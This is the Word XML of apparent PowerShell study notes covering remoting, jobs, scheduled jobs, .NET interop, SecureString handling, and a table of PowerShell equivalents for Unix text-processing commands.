    <w:p w14:paraId="186A764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Invoke-Command -ComputerName DC-1,DC-2 -ScriptBlock {Get-ADDefaultDomainPasswordPolicy} -Credential DOMAIN\Administrador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4748CB5A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Invoke-Command -ScriptBlock {Get-CimInstance -ClassName Win32_logicalDisk} -ComputerName DC-1 -Credential DOMAIN\Administrador</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAE06B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$version = Invoke-Command -ComputerName (Get-Content .\hosts.txt) -ScriptBlock {Get-Host | Select-Object -ExpandProperty Version}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0543D40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AB41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#Run a script on a server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4BA72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Invoke-Command -ComputerName CLI-4,CLI-2 -FilePath .\Check-VM.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14576F7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CC16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#To run a series of related commands that share data, use the New-PSSession cmdlet to create a PSSession (a persistent connection) on the remote computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7675B3E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$s = New-PSSession CLI-4,CLI-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C83E3C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Invoke-Command -Session $s -ScriptBlock {$p = Get-Process}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC57BE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Invoke-Command -Session $s -ScriptBlock {$p | foreach {$_.ProcessName}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552EC1A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C9009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#Enter a command stored in a local variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232936B1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$s = New-PSSession CLI-4,CLI-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F23EBD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$command = {Get-EventLog -Log Security -Newest 1 | Select-Object -ExpandProperty Message}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201C1C4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Invoke-Command -Session $s -ScriptBlock $command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7176BDF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2A091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#Implicit remoting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6D3F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$session = New-PSSession -ComputerName DC-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF4762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Invoke-Command -Command {import-module activedirectory} -Session $session </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2792567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Import-PSSession -Session $session -module activedirectory -Prefix rem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340BE13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New-remADuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CC71A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09F4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B6CEA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#Powershell Jobs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6E2C1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#Start Jobs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539E5B7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Start-Job -ScriptBlock {dir}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D27369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Start-Job -ScriptBlock {Get-EventLog -LogName Security -Newest 5 -ComputerName DC-1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6466740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7E38D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Get-Help * -Parameter asjob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A57531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Get-WmiObject win32_operatingsystem -ComputerName DC-1,CLI-1,CLI-2 -AsJob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531B820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Invoke-Command -Command {Get-Process} -ComputerName DC-1,SRV1,SRV2,SRV3 -AsJob -JobName MyJob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61583D3A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31CF7C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#Get jobs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF193BA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Get-Job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BD0B9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Get-Job -Id 1 | Format-List *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737211C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2086B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#Stop a job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDCCD5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Stop-Job -id 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBF02C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AB3FC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#Receive a job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683791A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Receive-Job -Id 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DB9BF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Receive-Job -Id 6 -Keep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FB4CF1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C376D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#Deletes a job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B3064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Get-Job | Remove-Job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6004820C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Remove-Job -id 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FDDF4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6C57C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#Run a background job on several remote computers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446F453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$s = New-PSSession CLI-4,CLI-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBFB22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Invoke-Command -Session $s -ScriptBlock{Get-EventLog -LogName "*Powershell" -Newest 5} -AsJob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0422C4E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$j = Get-Job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E8D56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$results = $j | Receive-Job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33503B3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FD9D6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Invoke-Command -ScriptBlock {Get-ChildItem -path C:\ -Recurse -File -Name *.ps1Get-ChildItem -path C:\ -Recurse -File -Name *.ps1} -ComputerName DC-1,SRV1,CLI-1 -AsJob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478C5721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F7573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#Scheduled Job.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DABF9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Register-ScheduledJob -Name DailyProcList -ScriptBlock {Get-Process} -Trigger (New-JobTrigger -Daily -At 2am) -ScheduledJobOption (New-ScheduledJobOption -WakeToRun -RunElevated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F4C43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Get-ScheduledJob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4718734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0C64C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$trigger=New-JobTrigger -At "6:00AM" -DaysOfWeek "Monday","Tuesday" -Weekly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46841B2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$command={Get-EventLog -LogName System -Newest 25 -EntryType Error | Export-Clixml c:\err.xml}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5511E18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Register-ScheduledJob -Name "System Errors" -ScriptBlock $command -Trigger $trigger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A070E9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Get-ScheduledJob -Id 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC81A1C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EA12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92E1C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#.NET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158AB30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#Load assembly manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0502D8A1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[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') | Out-null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593D5E1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FB51C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#Instantiating a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E3A65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$drive = New-Object -TypeName System.IO.DriveInfo -ArgumentList 'c:'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4671807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B4BA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#Using reflection : Get-Member utilizes a .Net Framework feature called reflection to see an object's members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4871EC0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$drive | Get-Member</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5578C8B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BA191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#Creates an instance of a Microsoft .NET Framework or COM object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F602DD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New-Object -TypeName System.Diagnostics.EventLog -ArgumentList Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CB5F5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$wsh = New-Object -ComObject Wscript.Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60150BA1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6C11D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#Explore assemblies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F4D2E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[System.AppDomain]::CurrentDomain.GetAssemblies()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194B961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92C8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#Public Types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BEC1F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[System.AppDomain]::CurrentDomain.GetAssemblies() | foreach {$_.GetTypes()} | Where-Object {$_.IsPublic -eq "True"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C22EE2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$cla = [System.AppDomain]::CurrentDomain.GetAssemblies() | foreach {$_.GetTypes()} | Where-Object {$_.IsPublic -eq "True"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731813F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$proc = $cla | Where-Object {$_.Name -contains "process"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC26F2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$proc.GetMethods() | Where-Object {$_.IsStatic -eq "True"} | Select-Object name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272EFA3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$proc | Get-Member -MemberType Method -Static</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5042021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[System.Diagnostics.Process]::GetProcesses()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F57451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$proc::GetProcesses()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2201315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E5E6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#Adds a.NET Framework type (a class) to a Windows PowerShell session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620844B2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Add-Type -AssemblyName System.Windows.Forms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7240521A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[System.Windows.Forms.MessageBox]::Show("Hello","Powershell",[System.Windows.Forms.MessageBoxButtons]::YesNo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289AAFC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$hots=[System.Net.Dns]::GetHostAddresses("www.google.com.pe")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515704C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FB7D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#Add a .NET type to a session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1D642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$Source = @"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B977E2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class Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCFD70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978927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 static string Hello()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41989DA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16E5CEA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("Hello Powershell!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0935266C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70FC39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 int sumar(int a, int b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CF673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9B6E63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(a + b);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AAD241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C50CE4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130611EC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"@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEA50F1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Add-Type -TypeDefinition $source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A300EF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[Test]::Hello()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BAABF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$objectTest= New-Object Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7462F55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$objectTest.add(1,2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136B250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88BA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#Generates a DLL file for the assembly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B93820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Add-Type -TypeDefinition $source -OutputType Library -OutputAssembly C:\Users\macos\Desktop\TestPS.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EF3A8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Add-Type -Path C:\Users\macos\Desktop\TestPS.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A42E1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$n = New-Object ([Test]::new())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8A2B22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$n.sumar(1,2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A5A952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D6CD5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#Call native Windows APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6924EA2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$Signature = @"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48373AD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[DllImport("user32.dll")]public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D9738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"@</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7631833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$ShowWindowAsync = Add-Type -MemberDefinition $Signature -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6484B7C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AB6B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 Minimize the Windows PowerShell console.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E91570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$ShowWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C3EC9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 Restore it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F579F1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$ShowWindowAsync::ShowWindowAsync((Get-Process -Id $Pid).MainWindowHandle, 4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8001F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81FD1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4992E2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#Miscellaneous:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4394A89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#The ConvertTo-SecureString cmdlet converts encrypted standard strings into secure strings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391577EF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#Converts encrypted standard strings to secure strings. It can also convert plain text to secure strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A6F10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ConvertTo-SecureString "Mi Clave" -AsPlainText -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7A68C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240B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#Convert a secure string to an encrypted string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184A26B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$Secure = Read-Host -AsSecureString</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBD1492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$Encrypted = ConvertFrom-SecureString -SecureString $Secure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CB252B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$Secure2 = ConvertTo-SecureString -String $Encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635DAD79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4E668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#Create a secure string from an encrypted string in a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5197E964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$Secure = Read-Host -AsSecureString</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE1715A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$Encrypted = ConvertFrom-SecureString -SecureString $Secure -Key (1..16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C6633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$Encrypted | Set-Content Encrypted.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9D0F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$Secure2 = Get-Content Encrypted.txt | ConvertTo-SecureString -Key (1..16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523230E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9F47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#The ConvertFrom-SecureString converts a secure string to an encrypted standard string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49745312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#Convert a secure string to an encrypted standard string with a 192-bit key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA3AB37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$SecureString = Read-Host -AsSecureString</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EC1002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$StandardString = ConvertFrom-SecureString $SecureString</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762EEAF3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$Key = (3,4,2,3,56,34,254,222,1,1,2,23,42,54,33,233,1,34,2,7,6,5,35,43)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F85E66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$StandardString = ConvertFrom-SecureString $SecureString -Key $Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534A14BE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AA4E0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#Gets a credential object based on a user name and password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F64013D" w14:textId="77777777" w:rsidR="00A865AF" w:rsidRPr="00A865AF" w:rsidRDefault="00A865AF" w:rsidP="00A86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5AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$credential = Get-Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D5D301" w14:textId="7FF2D829" w:rsidR="00D420B8" w:rsidRDefault="008850F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7143"/>
      </w:tblGrid>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="476C60F2" w14:textId="77777777" w:rsidTr="008850F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9A99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>#####################</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="72FA17D9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00240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31F0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Powershell Global #</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="23B294E8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1C49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07A59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#####################</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="0C029ADF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7435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EA61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1267928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4D0F4DCA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1E59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52529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Help or Manual pages with Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="78AF5E6A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82B8D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BB30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 gwmi -examples  ## help</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="73821150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6110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8119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E176B74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143B5038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F1189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0AF22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List Global Aliases</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="33069E34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135E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DDCA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alias | findstr /i ps  ## Get-Alias</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="096DF8FF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FF8E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C5862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44796B8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7CD85FBE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6148B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F046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List all Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="1BA94095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E000D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A84C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gcm  ## Get-Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="51809799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F46D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E184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A2611AA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70C674D6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B78D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2766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List Environment Variables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5F411658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20E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39B1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gci env:  ## Get-ChildItem/dir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5E62DC12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3242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F0FD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Set-Item -path env:TEAMS -value ($env:TEAMS + "finance")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="28A5B5D9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1874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FF92C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196FE46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19ECF888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E0751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BA52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List Available Modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="08C960BE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74802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23CF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gmo -listavailable  ## Get-Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="70BFC23A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1156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F6CC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42D165D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795052DD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B201D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BA18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List Module Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="02DADE25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7E9B0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CD31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gcm -module webadministration  ## Get-Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="79140A20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8DB2E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D2DDC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DE5199B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50A00565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55E05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4AAF9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List Roles and Features Installed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7D692D02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BE5F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1C1E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ipmo servermanager; get-windowsfeature | findstr '\[X\]'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="390A20A9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0A15C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B152D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F180F26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174F87EF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3D6E6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817C9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9A558E1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7AA3A707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E8748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8BC7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##############</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="450AE807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BAA8E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B02E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Formatting #</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5BD67CDE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4306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1D3C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##############</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="66F573FC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128FD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E51A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C5FEC34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5A47BB83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F765E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CDC99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User Input (read [-p])</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="73F5F29B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179F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FD4DD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$input = read-host "Choose an option: "</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7D1396D9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919B9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C99F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27B3E57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6FD47F89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EFDC9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B0B12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Limit Output per Page (less/more)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="76113C74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DAE5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63E4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gci -r | more</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="717C3B67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9339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CEEAA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76CBC30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2A709C4D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FC093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B9F7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Send Output to File</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="436B873E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8FF5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80CA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cat file.txt | Out-File [-append]  ## &gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="32E97194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01E0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DD25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B7AD926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63E13E89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70E76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29A9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Pipe Output to File (tee)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="65946E2C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90A00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181F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get-process | tee-object -file C:\output.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5940ED60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36EB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B4F6D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BB2E67C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4267AA10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F5CE9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C12BC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Format Output in Columns or List (column -t)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="70CBCA70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3F3A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6AD8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 | findstr "dll" | format-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="6D4A20F9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225F2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6871D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ps powershell | format-table -AutoSize -Wrap </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="32C99B1E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FEE90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FD8C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CBB9180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72291767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0898A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9637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Sort Output by Column</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="4C02C7A0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3C87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DAB5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 | sort-object lastwritetime</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="48D0C31B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1269C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2EE3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B1968A7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306C21E7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9C724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96BD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Trim/Select Output (head/tail)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="333A1996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D773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3E3E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gci | select -first 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7836F84C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46A3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C31F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gci | select -last 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5AD65169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074C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C787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gci | select -skip 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="2DD38B30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DFD5D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DB8E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6DBEB02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55869EA3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F73A6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47E8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Pattern Matching (grep [-o|-v])</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="016A2EFF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0C9C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8B239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gci -r | findstr /i "string"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="5A149798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98A8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46F7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 | ?{ $_ -match "dll|exe" }  ## NOT case-sensitive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="407125D2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895F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EB05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 | ?{ $_ -notmatch "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}" }  ## exclude</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="42BA4085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4C60D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EB59E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cat file.txt | select-string -not "^$|^#"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="40E8EC4F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A0B2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AB30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ED3080F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10425946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E69C4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C609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Exclude Newline (echo -n)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="58601D39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792C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750B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$output | write-host -nonewline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="72379656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DFC0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9AC9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FEE40C4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160263C0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F5A40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6309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Replace Strings (sed/replace)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7CF977D2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9896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9074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ps | foreach{$_ -replace "abc", "def"}</w:t>
            </w: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8850FC" w:rsidRPr="008850FC" w14:paraId="29B5A36A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6C09C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7C3F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cat file.txt | %{ $a = $_ -replace "\s+", " "; $parts = $a.split(); $parts[1] }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="66B2D064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AD45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0648C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4DE1404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5E8B5BFD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17E97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2672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Count Lines (wc -l)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="6498BC34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4F49E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926F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 | measure-object  ## total entries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="30B63278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8F500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BE03D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$orderedlist | group-object  ## sorted list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="7A00434F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AE2C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C086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0FB0BCB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45574F07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3225C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A1C9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Split Columns (awk/cut)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="550DFFD7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FA3A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5E48E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 | %{ $_.fullname.split('\')[-1].split('.')[0] }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="63ED77FA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CB64C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A374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676BAEB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0FD4D6A9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08AE9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DE55D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Sum all Fields in a Column</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="6BECBF78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BDBD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EE8F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cat .\test.csv | %{ [int]$total+=$_.Split(',')[2]; } ; Write-Host "Total: $total"  ## Get-Content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="18FF98AF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A5A1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E71E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4C58803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054D97CF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130E4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D60F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Number of Matches of a Pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="342A8326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59CF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3957C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Get-Content .\test.csv | %{ $a=$_.Split(','); Write-Host "Total Fields"$a[0]"="$a.length; }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="2609174B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61F1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4CBB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6D72091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7B71308D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F7010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AEB2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7EC331A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5C04C839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095B2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ACE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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="05698896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2164A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DD7B9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Logic #</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="140E5C74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994B2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A3EF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</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="3FB36AEA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D9600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038E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8437A31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43538AE4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966ED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E7CB9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For Loop (for)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008850FC" w:rsidRPr="008850FC" w14:paraId="2AC4704B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423D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04B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 | foreach { echo $_ }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
